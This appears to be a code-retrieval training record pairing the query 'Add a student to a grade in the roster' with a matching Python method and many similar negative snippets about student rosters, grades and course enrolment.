[ "0.70357305", "0.61918634", "0.6180321", "0.61655444", "0.61187875", "0.6078942", "0.6064046", "0.60455054", "0.60356414", "0.60095865", "0.59675676", "0.5928267", "0.5887183", "0.5879371", "0.5865206", "0.58481586", "0.58402777", "0.5822257", "0.5813019", "0.5812019", "0.58046603", "0.57986885", "0.5746263", "0.57218164", "0.57161504", "0.5708563", "0.5705498", "0.56950647", "0.56697726", "0.56639487", "0.5649606", "0.56440717", "0.5642649", "0.56377363", "0.5637059", "0.5634346", "0.56308717", "0.5620484", "0.5619968", "0.56194586", "0.5599918", "0.5596617", "0.5592885", "0.556101", "0.5534483", "0.55342686", "0.5532193", "0.552874", "0.5508508", "0.5492877", "0.54916286", "0.546077", "0.5454642", "0.54385823", "0.5436304", "0.54208994", "0.5418505", "0.5392792", "0.53834635", "0.538102", "0.5374693", "0.53691494", "0.5364897", "0.5364422", "0.53624284", "0.53586096", "0.5336416", "0.5328303", "0.5318989", "0.5316332", "0.5316249", "0.53137326", "0.5313641", "0.52953255", "0.528232", "0.52749264", "0.5271072", "0.5270799", "0.52578366", "0.5251188", "0.5248921", "0.52460194", "0.5239634", "0.5234603", "0.52341056", "0.5219074", "0.52150875", "0.52149475", "0.5213653", "0.52074623", "0.51696426", "0.5168701", "0.5163406", "0.51627105", "0.51600415", "0.515605", "0.5147448", "0.5145128", "0.51384073", "0.5127858" ]
0.6250706
1
Add a student to a grade in the roster.
def add_student(self, name: str, grade: int) -> None: school_grade = self.students.setdefault(grade, []) school_grade.append(name) school_grade.sort()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def add_student(self, student):\n if student in self.students:\n raise ValueError('Duplicate Student.')\n self.students.append(student)\n self.grades[student.id] = []\n self.is_sorted = False", "def addStudent(self, student):\n if student in self.students:\n raise ValueError(\"Duplicate Student\")\n self.students.append(student)\n self.grades[student.getIDNumber()] = []\n self.isSorted = False", "def add_student():\n\n\tprint('You must enter the student as is:\\n'\n\t\t\"'First name', 'middle name', 'Last name', 'major', 'major', 'gpa', id_number, 'minor'\"\n\t\t\" 'minor' graduation year, advisor number\\n For example: 'Kyle', 'Jacob', 'Ranney', 'Insurance'\"\n\t\t\", 'Chemistry', 3.0, 93988, 'Biology', 'NULL', 2016, 2234\\n\")\n\t# use sql insert statement\n\t# become familiar with this!\t", "def AddGrade(self, student, discipline, grade_value):\n if not self.__data['s'].HasKey(student.ID):\n raise NonExistentItemIDError(\"Student does not exist.\")\n if not self.__data['d'].HasKey(discipline.ID):\n raise NonExistentItemIDError(\"Discipline does not exist.\")\n self.__data['g'].AddItems([Grade(self.__data['g'].GetSafeKey(), student.ID, discipline.ID, grade_value)])\n self.__undo_list.append(['g'])\n self.__redo_list.clear()", "def AddStudent(self, event):\n pass", "def add_student(self, student: 'Student') -> None:\n # Add HOUSEHOLD attributes to the schools' composition\n self.total += 1\n self.composition += student.household.attributes\n self.students[student.idx] = student\n self.has_space = (self.total < self.capacity)", "def AddStudent(self, student_name):\n self.__data['s'].AddItems([Student(self.__data['s'].GetSafeKey(), student_name)])\n self.__undo_list.append(['s'])\n self.__redo_list.clear()", "def add_student(body): # noqa: E501\n if connexion.request.is_json:\n body = Student.from_dict(connexion.request.get_json()) # noqa: E501\n return student_service.add_student(student=body)", "def addStud(self,ID,name,attNr,grade):\n if ID < 0: raise Exception(\"Invalid ID!\")\n parts = name.split(' ')\n if len(parts) < 2: raise Exception('Invalid name!')\n for part in parts:\n if len(part)<3: raise Exception('Invalid name!')\n if attNr < 0: raise Exception('Invalid number of attendances!')\n if grade not in range(0,11): raise Exception('Invalid grade!')\n self.__studRepo.add(Student(ID,name,attNr,grade))", "def add_student(user_inputs):\r\n no_space = (remove_space(user_inputs))\r\n student_tuple = student_info._make(no_space.split(\",\"))\r\n StudentRoster.append(student_tuple)", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def addStudent():\n name = input(\"Name: \")\n number = input(\"Number: \")\n gpa = input(\"GPA: \")\n field = input(\"Field: \")\n student = Student(name, number, gpa, field)\n if t.insert(number, student):\n ht.insert(student)\n print(name, \"added successfully.\")\n else:\n print(\"student number is not valid.\")", "def test_add_student():\n classroom = setup_for_test()\n student = Student(\"Andrew Tsukuda\")\n classroom.add_student(student)\n assert len(classroom.student_dir) == 1\n assert classroom.student_dir[0].ID == 1", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def add_student(body): # noqa: E501\n if connexion.request.is_json:\n student = Student.from_dict(connexion.request.get_json()) # noqa: E501\n # print(student)\n result = student_service.add_student(student)\n return result\n\n return 'input no bueono', 400", "def assign_grade(github, title, grade):\n QUERY = \"\"\"\n INSERT INTO Grades VALUES (?, ?, ?)\n \"\"\"\n\n db_cursor.execute(QUERY, (github, title, grade))\n db_connection.commit()\n\n print \"Successfully graded %s with a %s on %s\" % (github, grade, title)", "def add_student():\n if request.method == 'POST':\n db.add_student(request.form)\n return redirect('/registry')\n else:\n return render_template('add.html')", "def insert_grade(grade, form, rc):\n dbname = form[\"dbname\"]\n collname = \"grades\"\n try:\n coll = rc.client[dbname][collname]\n except (KeyError, AttributeError):\n abort(404)\n try:\n added = rc.client.insert_one(dbname, collname, grade)\n except Exception:\n traceback.print_exc()\n raise", "def _save_grade(self):\r\n student = self._student('POST', key='grader_id')\r\n if student is None:\r\n self._error_response()\r\n\r\n else:\r\n # Update the number of essays the student has graded\r\n student.grade_peer_essay()\r\n return self._success_response({})", "def createStudent(self):\n self.createProfile()\n from soc.modules.gsoc.models.profile import GSoCStudentInfo\n properties = {'key_name': self.profile.key().name(), 'parent': self.profile}\n self.profile.student_info = seeder_logic.seed(GSoCStudentInfo, properties)\n self.profile.put()", "def add_student():\n # import pdb; pdb.set_trace()\n if request.method == \"POST\":\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n\n html = render_template(\"added_student_confirmation.html\",\n first=first,\n last=last,\n github=github)\n\n return html", "def assign_grade(github, title, grade):\n QUERY = \"\"\"INSERT INTO Grades VALUES(?,?,?)\"\"\"\n db_cursor.execute(QUERY, (github, title, grade))\n db_connection.commit()\n print \"Success! %s received a grade of %s on the %s project!\" % (github, grade, title)", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self", "def enroll_student(self, student_email):\n # check if course exists\n if not self.is_course_exists():\n print(\"The given course not found\")\n return\n\n if self.is_student_enrolled(student_email):\n print(\"The course is not exists or/ and student {} is already enrolled\".format(student_email))\n return\n else:\n db = self._file.read_db()\n for crs_i in range(len(db[\"courses\"])):\n if db[\"courses\"][crs_i][\"course_name\"] == self._course_name:\n db[\"courses\"][crs_i][\"students\"].append(student_email)\n break\n self._file.write_db(db)\n print(\"The new student is enrolled to course: {}\".format(self._course_name))", "def _add_grade_to_row(self, component, score):\r\n component_index = self.components.setdefault(component, len(self.components))\r\n self._current_row[component_index] = score", "def added_student():\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n first, last, github = hackbright.get_student_by_github(github)\n\n html = render_template(\"student_added.html\", first=first, last=last, github=github)\n\n return html", "def add_row(self, student_id):\r\n self._current_row = {}\r\n yield self._add_grade_to_row\r\n self.grades[student_id] = self._current_row", "def copy_and_add_student(self, new_student, happiness, stress):\n new_room = Room(self.rm_id)\n new_room.students = frozenset(list(self.students) + [new_student])\n new_room.stress = self.stress + stress\n new_room.happiness = self.happiness + happiness\n return new_room", "def editStudent(s, number):\n nname = input(\"New Name: \")\n nnumber = input(\"New Number: \")\n ngpa = input(\"New GPA: \")\n nfield = input(\"New Field: \")\n\n deleteStudent(s, number)\n student = Student(nname, nnumber, ngpa, nfield)\n if t.insert(nnumber, student):\n ht.insert(student)\n print(nname, \"edited successfully.\")\n else:\n print(\"new student number is not valid.\")", "def add_student():\n\n return render_template(\"student_add.html\")", "def added_student():\n\n first = request.form.get('first')\n last = request.form.get('last')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n\n return render_template(\"student_confirmed.html\",\n first=first,\n last=last,\n github=github)", "def add_student_data(connection,fname,lname,class_n,marks):\r\n with connection:\r\n connection.execute(INSERT_STUDENT,(fname,lname,class_n,marks))", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def take_test(exam, student):\n\n student.score = exam.administer()", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"INSERT INTO Students VALUES(?,?,?)\"\"\"\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def post_student():\n\n first_name = request.form.get('first_name')\n last_name = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first_name, last_name, github)\n\n flash(\"Successfully added new student.\")\n\n return redirect(\"/student?github={}\".format(github))", "def set_grade(\n self,\n assignment_id,\n student_id,\n grade_value,\n gradebook_id='',\n **kwargs\n ):\n # pylint: disable=too-many-arguments\n\n # numericGradeValue stringified because 'x' is a possible\n # value for excused grades.\n grade_info = {\n 'studentId': student_id,\n 'assignmentId': assignment_id,\n 'mode': 2,\n 'comment': 'from MITx {0}'.format(time.ctime(time.time())),\n 'numericGradeValue': str(grade_value),\n 'isGradeApproved': False\n }\n grade_info.update(kwargs)\n log.info(\n \"student %s set_grade=%s for assignment %s\",\n student_id,\n grade_value,\n assignment_id)\n return self.post(\n 'grades/{gradebookId}'.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n data=grade_info,\n )", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"\n INSERT INTO Students VALUES(?, ?, ?)\"\"\"\n \n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def set_student(self, student_id):\n self._student = student_id", "def register_student(self, **fields):\n if 'student_key' not in fields.keys():\n raise KeyError('Primary key is missing')\n existing_fields = [i.name for i in self._db.get_columns('students')]\n needed_fields = {}\n for key, value in fields.items():\n if key in existing_fields:\n needed_fields[key] = value\n if 'UID' not in needed_fields.keys():\n needed_fields['UID'] = needed_fields['student_key']\n check = Students.get_or_none(student_key=needed_fields['student_key'])\n if check is not None:\n return check\n dummy_parent = Parents.get(parent_key=fields['parent']) if 'parent' in fields else Parents.get(parent_key='0')\n new_student = Students.get_or_create(parent=dummy_parent, **needed_fields)\n return new_student[0]", "def __ui_add_student(self):\n student_id = input(\"student_id: \")\n student_name = input(\"student_name: \")\n\n print(\"Give disciplines for student, enter for done\")\n disciplines_list = []\n\n discipline_name = '0'\n while discipline_name != '':\n discipline_name = input(\"Discipline discipline_name: \")\n if discipline_name == '':\n break\n elif self.__discipline_controller.find_by_name(discipline_name) is not None:\n disciplines_list.append(discipline_name)\n print(\"Add discipline successful\\n\")\n else:\n print(\"Invalid discipline!\")\n\n try:\n self.__student_controller.add_student(student_id, student_name, disciplines_list)\n print(\"Add student successful\\n\")\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return", "def make_new_student(first_name, last_name, github):\n\n QUERY = \"\"\"INSERT INTO Students VALUES (?, ?, ?)\"\"\"\n # Query...all caps as a constant here, a string that will not change, (and only in the scope of this function!)\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def addCourse(self):\n\t\tcourseName = input(\"What is the new course name? \")\n\t\tcourseGrade = eval(input(\"What grade point did you get? \"))\n\t\tself.courses.append(Course(courseName,courseGrade))\n\t\tself.gpa = self.calculateGPA()", "def _enroll_students_in_course(self, course_id, num_students):\r\n\r\n for _ in range(num_students):\r\n random_id = uuid4().hex[:8]\r\n self.create_student(username='student{0}'.format(random_id))", "def give_extra_credit(grades,netids,bonus):\n # No accumulator. This is a procedure\n \n for student in netids:\n if student in grades: # Test if student is a key in grades\n grades[student] = grades[student]+bonus", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def register_student(request):\n email = auth.check_login(request)\n if email:\n db = database.Database()\n db.add_student(email, \"\", \"\")\n return True\n return False", "def add_instance_of_course(self, semester, professor, crn, status):\n self.semesters.append(semester)\n self.professors.append(professor)\n self.statuses.append(status)\n self.instances[crn] = (semester, professor, status)", "def add_recommendation(self, user_id, event_id, score):\r\n\r\n sql_command = \"\"\"\r\n INSERT INTO UserRecommendations(user_id, event_id, rating)\r\n VALUES ( ? , ? , ?);\r\n \"\"\"\r\n\r\n values = (user_id, event_id, score)\r\n self.controller.execute(sql_command, values)\r\n self.connection.commit()", "def createStudentWithProposal(self):\n self.createStudent()\n from soc.modules.gsoc.models.proposal import GSoCProposal\n properties = {'link_id': self.profile.link_id, 'scope': self.profile,\n 'parent': self.profile, 'status': 'new'}\n seeder_logic.seed(GSoCProposal, properties)", "def add(self, rank, birth_year, enlisting_year, shirt_color, name):\n # Your implementation here", "def edit_grade(self, username: str, token: str, course_abbreviation: str, student_id: str, updated_grade: float) -> bool:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get the student's UID\n student_uid = self.get_uid(username=student_id)\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Run update in the DB\n cursor.execute('''\n UPDATE enrollment_records SET grade = ? WHERE uid = ? AND course_id = ?\n ''', (updated_grade, student_uid, course_id))\n self._db_connection.commit()\n\n return True", "def add_students_to_table(students):\n for student_name, points in students.items():\n try:\n Student.create(username=student_name, points=points)\n except IntegrityError: # IntError occurs when username already exists\n student_record = Student.get(username=student_name)\n if student_record.points != points:\n student_record.points = points\n student_record.save()", "def test01_add_new_student_with_admin(self):\n students_list_with_new_student = self.students_page.\\\n click_edit_students_list_button().\\\n click_add_new_student_button().\\\n enter_student_data(data['first_new_student']).\\\n click_save_data_changes_button().\\\n click_exit_students_list_editor_button().\\\n students_table()\n student = data_student_for_check(data['first_new_student'])\n self.assertEqual(self.main_page.get_current_url(),\n data['expected_url'])\n self.assertIn(student, students_list_with_new_student)", "def take_test(exam, student):\n\n student.score = exam.administer()\n return student.score", "def test14_add_new_student_with_teacher(self):\n students_list_with_new_student = self.students_page. \\\n click_edit_students_list_button(). \\\n click_add_new_student_button(). \\\n enter_student_data(data['third_new_student']).\\\n enter_name_approved_by_custom(data['third_new_student']). \\\n click_save_data_changes_button(). \\\n click_exit_students_list_editor_button(). \\\n students_table()\n student = data_student_for_check(data['third_new_student'])\n self.assertEqual(self.main_page.get_current_url(),\n data['expected_url'])\n self.assertIn(student, students_list_with_new_student)\n return self.students_page", "def set_grade(github, project_title, grade_value):\n \n QUERY = \"\"\"INSERT INTO Grades VALUES (?, ?, ?)\"\"\"\n \n db_cursor.execute(QUERY, (github, project_title, grade_value))\n db_connection.commit()\n\n \n # print \"%s %s's grade: %s\" % (first_name, last_name, grade)\n print \"Successfully graded %s on Project %s: %s\" % (github, project_title, grade_value)", "def add_student(lstudents, lnotes):\n option = 'y'\n\n while option == 'y':\n\n try:\n name = input('Name: ')\n qualification = float(input('Qualification: '))\n lstudents.append(name)\n lnotes.append(qualification)\n\n except ValueError:\n print('wrong value')\n\n option = input(\n 'if you want add more studets press: \\'y\\' otherwise press any key: ')", "def _grade_with_errors(student, request, course, keep_raw_scores=False):\r\n if student.username in ['student3', 'student4']:\r\n raise Exception(\"I don't like {}\".format(student.username))\r\n\r\n return grade(student, request, course, keep_raw_scores=keep_raw_scores)", "def option1(self):\n ID = int(input(\"ID: \"))\n name = input(\"Name: \")\n attNr = int(input(\"Number of attendances: \"))\n grade = int(input(\"Grade: \"))\n self.__srv.addStud(ID,name,attNr,grade)", "def add_book_to_user(self, book, email, rating=None):\n if self.users.get(email):\n self.users[email].read_book(book, rating)\n self.books[book] = self.books.get(book, 0) + 1\n if rating:\n book.add_rating(rating)\n else:\n print(\"{email} address not found.\".format(email=email))", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def test09_add_new_student_with_coordinator(self):\n students_list_with_new_student = self.students_page. \\\n click_edit_students_list_button(). \\\n click_add_new_student_button(). \\\n enter_student_data(data['second_new_student']). \\\n click_save_data_changes_button(). \\\n click_exit_students_list_editor_button(). \\\n students_table()\n student = data_student_for_check(data['second_new_student'])\n self.assertEqual(self.main_page.get_current_url(),\n data['expected_url'])\n self.assertIn(student, students_list_with_new_student)", "def create_student(conn, student, first_name, last_name, major, start_date):\n sql = ''' INSERT INTO student(firstname, lastname, major, start_date)\n VALUES(?,?,?,?) '''\n cur = conn.cursor() # cursor object\n cur.execute(sql, student)\n # return cur.lastrowid # returns the row id of the cursor object, the student id\n first_name.set('')\n last_name.set('')\n major.set('')\n start_date.set('')\n messagebox.showinfo('Success', 'Student Successfully Added to the Database!')", "def add_score(self, score):\n self._score += score", "def on_add_clicked(self):\n selected_indexes = self.ui.availListView.selectedIndexes()\n for index in selected_indexes:\n row = self.availModel.itemFromIndex(index).row()\n #rowList = self.availModel.takeRow(row)\n student = self.availModel.item(row, 0).text()\n sid = self.availModel.item(row, 1).text()\n try:\n # Actually add the student for the date into the database\n self.db.student_attend(sid, self.date_string)\n except KeyError:\n # Display error window if student missing\n err_msg = QtGui.QErrorMessage()\n err_msg.showMessage(\"Sid not found for student %s\" % student)\n\n self.update_views()", "def add_score(self, player, level, score):\n cursor = self._connection.cursor()\n command = 'INSERT INTO scores (player, level, score) VALUES (?, ?, ?)'\n cursor.execute(command, [player, level, score])\n self._connection.commit()", "def add_grades(self, subject_name, grade_list, attendance=True): \n\t\n\t\tif (isinstance(subject_name, str) and isinstance(grade_list, list)):\n\t\t\tfor grade in grade_list:\n\t\t\t\tself.grades.setdefault(subject_name, []).append(grade)\n\t\t\tself.attendance += 1 if attendance else 0", "def __init__(self, name, skill):\n \n super(Student, self).__init__(name)\n self.grades = []\n self.skill = skill", "def add_student():\r\n reply = True\r\n while reply is True:\r\n reply = yes_or_no('Do you want to add a student?')\r\n if reply is True:\r\n student_name = input('Enter student name: ') or \"-1\"\r\n student_id = input('Enter student id: ') or \"-1\"\r\n student = {\"name\": student_name, \"student_id\": student_id}\r\n students.append(student)\r\n save_file(student_name)", "def add_to_score(self, to_add):\n self.score += to_add", "def enroll_students(self, student_emails, nid=None):\n if self.cookies is None:\n raise NotAuthenticatedError(\"You must authenticate before making any other requests.\")\n\n nid = nid if nid else self._nid\n\n content_url = self.base_api_url\n content_params = {\"method\": \"network.update\"}\n content_data = {\n \"method\": \"network.update\",\n \"params\": {\n \"id\": nid,\n \"from\": \"ClassSettingsPage\",\n \"add_students\": student_emails\n }\n }\n\n r = requests.post(\n content_url,\n data=json.dumps(content_data),\n params=content_params,\n cookies=self.cookies\n ).json()\n\n if r.get(u'error'):\n raise Exception(\"Could not add users.\\n{}\".format(r))\n else:\n return r.get(u'result')", "def addStudent(request):\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"blood_groups\": context_helper.blood_group_helper(),\n\t\t\"guardian_types\": context_helper.guardian_type_helper(),\n\t\t\"gender_type\": context_helper.gender_helper(),\n\t}\n\tif request.method == 'POST':\n\t\tsname = request.POST.get('sname')\n\t\troll = request.POST.get('rno')\n\t\tdob = request.POST.get('dob')\n\t\tgender = request.POST.get('gender_picker')\n\t\tbgroup = request.POST.get('blood_group_picker')\n\t\tif bgroup == 'Choose option':\n\t\t\tbgroup = None\n\t\tphone = request.POST.get('phone')\n\t\tcurradd = request.POST.get('curradd')\n\t\tpermadd = request.POST.get('permadd')\n\t\tgname = request.POST.get('gname')\n\t\tcourse = request.POST.get('course_picker')\n\t\tbatch = request.POST.get('batch')\n\t\tgtype = request.POST.get('guardian_type_picker')\n\t\tgphone = request.POST.get('gphone')\n\t\temail = request.POST.get('email')\n\t\tduplicate_student = models.Student.objects.filter(\n\t\t\tname=sname, dob=dob, guardian_name=gname,\n\t\t\tguardian_type=gtype, phone=phone, email=email\n\t\t).first()\n\t\tif duplicate_student:\n\t\t\tcontext_dict[\"message\"] = 'Student already exist.'\n\t\t\tduplicate_student.soft_delete=False\n\t\t\tduplicate_student.save()\n\t\t\treturn render(request, \"AddStudent.html\", context_dict)\n\t\taddress_flag = request.POST.get('address_flag')\n\t\taddress_flag = True if address_flag == 'on' else False\n\t\tif address_flag == True:\n\t\t\tpermadd = curradd\n\t\ttry:\n\t\t\tstudent = models.Student(\n\t\t\t\tname=sname,\n\t\t\t\troll_no=roll,\n\t\t\t\tdob=dob,\n\t\t\t\tgender=gender,\n\t\t\t\tblood_group=bgroup,\n\t\t\t\tphone=phone,\n\t\t\t\tcurr_address=curradd,\n\t\t\t\tperm_address=permadd,\n\t\t\t\tguardian_name=gname,\n\t\t\t\tguardian_type=gtype,\n\t\t\t\tguardian_phone=gphone,\n\t\t\t\tcourse=models.Course.objects.get(pk=course),\n\t\t\t\tbatch=batch,\n\t\t\t\temail=email,\n\t\t\t\taddress_flag=address_flag\n\t\t\t)\n\t\t\tif \"profile-img\" in request.FILES:\n\t\t\t\tstudent.photo = request.FILES[\"profile-img\"]\n\t\t\tstudent.save()\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity='Added roll number' + str(roll) +'.\\n',\n\t\t\t\tactivity_type=\"add student\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully added new student.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\treturn render(\n\t\trequest, \"addStudent.html\", context_dict\n\t)", "def post(self):\n studentname = self.request.get(\"studentname\")\n semail = self.request.get(\"semail\")\n sphone = self.request.get(\"sphone\")\n startdate = self.request.get(\"startdate\")\n\n if studentname and semail and sphone and startdate: \n\n #create new student object and store it in the database \n student = Student(\n studentname=studentname, \n semail=semail,\n sphone=sphone, \n startdate=startdate)\n student.put()\n\n id = student.key().id()\n self.redirect(\"/student/%s\" % id)\n else:\n error = \"Please include name of student, an email, a phone number and a start date.\"\n self.render_form(studentname, semail, sphone, startdate, error)", "def add_book_to_user(self, book, email, rating=None):\n if email in self.users.keys():\n self.users[email].read_book(book, rating)\n if rating is not None:\n book.add_rating(rating)\n\n if book in self.books.keys():\n self.books[book] += 1\n else:\n self.books[book] = 1\n else:\n return f\"No user with email {email}!\"", "def save_grade(request, course_id):\r\n\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n _check_access(request.user, course_key)\r\n\r\n if request.method != 'POST':\r\n raise Http404\r\n p = request.POST\r\n required = set(['score', 'feedback', 'submission_id', 'location', 'submission_flagged'])\r\n skipped = 'skipped' in p\r\n #If the instructor has skipped grading the submission, then there will not be any rubric scores.\r\n #Only add in the rubric scores if the instructor has not skipped.\r\n if not skipped:\r\n required.add('rubric_scores[]')\r\n actual = set(p.keys())\r\n missing = required - actual\r\n if len(missing) > 0:\r\n return _err_response('Missing required keys {0}'.format(\r\n ', '.join(missing)))\r\n\r\n success, message = check_feedback_length(p)\r\n if not success:\r\n return _err_response(message)\r\n\r\n grader_id = unique_id_for_user(request.user)\r\n\r\n location = course_key.make_usage_key_from_deprecated_string(p['location'])\r\n\r\n try:\r\n result = staff_grading_service().save_grade(course_key,\r\n grader_id,\r\n p['submission_id'],\r\n p['score'],\r\n p['feedback'],\r\n skipped,\r\n p.getlist('rubric_scores[]'),\r\n p['submission_flagged'])\r\n except GradingServiceError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"Error saving grade in the staff grading interface in open ended grading. Request: {0} Course ID: {1}\".format(\r\n request, course_id))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n except ValueError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"save_grade returned broken json in the staff grading interface in open ended grading: {0}\".format(\r\n result_json))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n if not result.get('success', False):\r\n #This is a dev_facing_error\r\n log.warning(\r\n 'Got success=False from staff grading service in open ended grading. Response: {0}'.format(result_json))\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n # Ok, save_grade seemed to work. Get the next submission to grade.\r\n return HttpResponse(json.dumps(_get_next(course_id, grader_id, location)),\r\n mimetype=\"application/json\")", "def add_course(self, course):\n if course in self.courses:\n raise NameError('This student is already enrolled in that course')\n else:\n self.courses[course] = 0\n\n return self", "def student_add():\n\n html = render_template(\"student_add.html\")\n\n return html", "def save_grade(self, course_id, grader_id, submission_id, score, feedback, skipped, rubric_scores,\r\n submission_flagged):\r\n data = {'course_id': course_id.to_deprecated_string(),\r\n 'submission_id': submission_id,\r\n 'score': score,\r\n 'feedback': feedback,\r\n 'grader_id': grader_id,\r\n 'skipped': skipped,\r\n 'rubric_scores': rubric_scores,\r\n 'rubric_scores_complete': True,\r\n 'submission_flagged': submission_flagged}\r\n\r\n result = self._render_rubric(self.post(self.save_grade_url, data=data))\r\n tags = [u'course_id:{}'.format(course_id)]\r\n self._record_result('save_grade', result, tags)\r\n return result", "def set_student_id(self, student_id):\n self._student_id = student_id", "def addUsertoDatabase(self):\r\n self.c.execute(\"\"\"INSERT INTO student_information VALUES (?,?,?)\"\"\",(self.name,self.password,self.budget,))\r\n self.con.commit()\r\n print(\"Added to Database Student..\")", "def __init__(self, student):\n pass", "def insert_students(ids, fname, lname, db_name='./grades.sqlite3'):\n names_tupple = list(zip(ids, fname, lname, [0] * len(ids)))\n with lite.connect(db_name) as con:\n cur = con.cursor()\n cur.executemany('INSERT OR REPLACE INTO STUDENTS \\\n (pipeline_id, first_name, second_name, cheating_ratio)'\n ' VALUES (?, ?, ?, ?)', names_tupple)\n con.commit()", "def addGrade(gradeName, gradeColumn):\n\n grades = []\n sheet = wb[wb.sheetnames[0]]\n for i in range(0,13):\n sourceValue = sheet.cell(row=10+i, column=gradeColumn).value\n grades.append(sourceValue)\n allGrades[wb.sheetnames[0]] [gradeName] = grades\n return allGrades", "def add_student():\n first_name = tkinter.StringVar()\n last_name = tkinter.StringVar()\n major = tkinter.StringVar()\n start_date = tkinter.StringVar()\n L1 = tkinter.Label(m, text=\"First Name:\").grid(row=1, column=2)\n E1 = tkinter.Entry(m, textvariable=first_name).grid(row=1, column=3)\n L2 = tkinter.Label(m, text=\"Last Name:\").grid(row=2, column=2)\n E2 = tkinter.Entry(m, textvariable=last_name).grid(row=2, column=3)\n L3 = tkinter.Label(m, text=\"Major:\").grid(row=3, column=2)\n E3 = tkinter.Entry(m, textvariable=major).grid(row=3, column=3)\n L4 = tkinter.Label(m, text=\"Start Date:\").grid(row=4, column=2)\n E4 = tkinter.Entry(m, textvariable=start_date).grid(row=4, column=3)\n global conn\n with conn:\n tkinter.Button(m, text=\"Submit\", width=25,\n command=lambda: create_student(conn, (first_name.get(), last_name.get(), major.get(), start_date.get()),\n first_name, last_name, major,\n start_date)).grid(row=5,\n column=3) # calls create student function", "def do_add(self, arg):\n first = input('First name: ')\n last = input('Last name: ')\n member = Member(first, last)\n introducedDate = input(\n 'introduced (optional. Use yyyy-mm-dd format): ')\n member.introducedDate = introducedDate\n self.roster.add(member)", "def addstar(starname):\n try:\n Star.create(name=starname)\n except IntegrityError:\n print(('Star {0} already in database. Record not created, but can be updated.'.format(starname)))", "def addSkill(self, newskill):\n self.skills.append( newskill )", "def add_grading_policy(self, grading_policy):\r\n\r\n self.course.grading_policy = grading_policy\r\n store = editable_modulestore()\r\n store.update_item(self.course, '**replace_user**')\r\n self.refresh_course()", "def bulk_add_student_to_course(unis, course):\n for uni in unis:\n uni = uni.strip('\\r')\n if not uni:\n continue\n student = students_model.Student(uni=uni)\n if not student.fetched:\n flask.session['messages'].append({\n 'type': 